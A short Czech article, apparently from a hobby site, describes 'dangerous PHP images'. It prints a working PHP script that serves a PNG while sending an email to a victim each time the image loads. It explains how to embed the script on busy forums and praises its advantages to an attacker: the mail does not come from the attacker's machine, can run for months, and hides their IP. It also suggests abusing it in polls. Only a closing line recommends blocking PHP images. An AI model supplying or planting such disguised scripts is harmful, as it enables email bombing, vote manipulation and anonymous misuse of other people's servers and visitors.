Nebezpečné php obrázky

Tento článek píše o nebezpečí php obrázků na stránkách a fórech

Zde je příklad email bomberu:

obrazek.php <? header('Content-Type: image/png'); $img = file_get_contents('obrazek.png'); echo $img; mail("obet@obet.cz", "Hack", "Tvuj email byl hacknut!","From: utocnik@utocnik.cz"); ?>

Tento php script vypíše obrázek obrazek.png + odešle email. Nyní stačí vložit tento script ,jako obrázek na stránku nebo fórum. Poté co nějaký návštěvník zobrazí náš obrázek se odešle email. Největší výhoda je ,že se email neodesílá z vašeho počítače ,takže můžete emaily odesílat třeba 2 měsíce vkuse + ip adresa není vaše. Další využití může být třeba v anketách.

Jestliže, takový obrázek vložíte na nějaké hodně navtěvované forum ,tak následky můžou být strašlivé. Proto doporučuji php obrázky úplně blokovat.

Fil-kun